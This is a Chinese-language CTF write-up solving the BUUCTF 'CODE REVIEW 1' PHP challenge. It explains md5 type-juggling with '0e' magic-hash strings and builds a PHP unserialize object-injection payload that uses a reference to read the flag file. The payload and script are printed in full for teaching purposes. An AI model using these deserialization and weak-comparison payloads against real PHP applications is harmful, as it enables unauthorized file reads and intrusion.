【CTF练习】BUU CODE REVIEW 1（代码审计）

题目源码

<?php
/**
 * Created by PhpStorm.
 * User: jinzhao
 * Date: 2019/10/6
 * Time: 8:04 PM
 */

highlight_file(__FILE__);

class BUU {
   public $correct = "";
   public $input = "";

   public function __destruct() {
       try {
           $this->correct = base64_encode(uniqid());
           if($this->correct === $this->input) {
               echo file_get_contents("/flag");
           }
       } catch (Exception $e) {
       }
   }
}

if($_GET['pleaseget'] === '1') {
    if($_POST['pleasepost'] === '2') {
        if(md5($_POST['md51']) == md5($_POST['md52']) && $_POST['md51'] != $_POST['md52']) {
            unserialize($_POST['obj']);
        }
    }
}

首先我们可以看到这份php代码有两个部分：类函数、条件判断

大致流程

第一个if满足进入的条件为get 传参的值为1 。

第二个if满足条件为post 传参的值为2 。

第三个if满足条件为 需要两个不同的数。且这两个不同的数值的md5 的却相同 。

如果 1、2、3 条件都满足之后就会执行反序列化，通过POST 传参obj 执行，然后进入类函数
类函数也有一个if满足条件为属性correct与属性input相等。 但是correct 却是利用一个时间进行计算的值的base64 值。

那么为什么执行反序列化就会自动进行类函数执行呢，我们来了解一下魔术方法

魔术方法（Magic Methods）

在PHP中，魔术方法（Magic Methods）是一些具有特殊名字和功能的方法，它们允许你在类中执行特殊的操作。这些方法的名字都以双下划线 --开头和结尾。魔术方法提供了一种在特定事件发生时自动调用的机制，以增强类的行为。
__destruct:
当一个对象被销毁时调用，用于清理资源或执行其他操作。如本题

class BUU {
   public $correct = "";
   public $input = "";

   public function __destruct() {
       try {
           $this->correct = base64_encode(uniqid());
           if($this->correct === $this->input) {
               echo file_get_contents("/flag");
           }
       } catch (Exception $e) {
       }
   }
}

实战流程

1.get传参1

2.post传参2

在bp上转换method，pleaseget会自动下来，要自己手动改成post后面

3.md5值比较

md51 !=md52 但是要满足md5(md51) ==md5(md52)

又要相等，又要不等看起来看离谱。但是在弱类型比较中是可以实现的

在 PHP 中，弱类型比较是指在比较两个值时，PHP 尝试将它们转换为相同的类型，然后再进行比较。在弱类型比较中，如果两个值的类型不同，PHP 会尝试根据一定的规则将它们转换为相同的类型，然后再进行比较。

但是呢！解决方法就是：
在 PHP 中，如果字符串以 0e 开头并且后面是纯数字，它会被解释为科学计数法，并且其值会被认为是 0。
这是因为在 PHP 中，0e 表示 0 乘以 10 的某个次方，而后面的数字表示指数。由于 0 乘以任何数都是 0，所以整个表达式的结果被解释为 0。这可能导致一些安全性问题，尤其是在处理哈希比较时。
例如：

$str1 = '0e12345';
$str2 = '0e67890';

if ($str1 == $str2) {
    echo "Equal";
} else {
    echo "Not equal";
}

尽管 $str1 和 $str2 是不同的字符串，由于它们都以 0e 开头并后跟数字，它们被弱类型比较认为是相等的，输出 “Equal”。
所以我们现在就可以找两个值加密后0e开头，且0e后面是纯数字的字符串即可（有很多，大家可以去搜搜）

字符串	md5
QNKCDZO	0e830400451993494058024219903391
s155964671a	0e342768416822451524974117254469
s878926199a	0e545993274517709034328855841020

接下来就可以写第三步的传参，传参方式和post一样， 使用& 符号链接。 内容如下图

4. 序列化构造（引用！）

<?php
class BUU {
   public $correct = "";
   public $input = "";

   public function __destruct() {
       try {
           $this->correct = base64_encode(uniqid());
           if($this->correct === $this->input) {
               echo file_get_contents("/flag");
           }
       } catch (Exception $e) {
       }
   }
}
$a=new BUU();
$a->input=&$a->correct;
echo serialize($a);
?>

为什么要这么构造呢？因为uniqid() 产生的数是随时变化的，无法预测，所以input 传值多少无法确定。那么我们就得把值确定下来，这个引用就类似c++指针一样，引用是一种使两个变量共享同一内存空间的机制
举例：

$a = 5;
$b = &$a; // $b 是 $a 的引用

echo $a; // 输出 5
echo $b; // 输出 5

$b = 10; // 修改 $b 的值，也会影响 $a

echo $a; // 输出 10
echo $b; // 输出 10

ok 得到obj的值是O:3:“BUU”:2:{s:7:“correct”;s:0:“”;s:5:“input”;R:2;}

FLAG！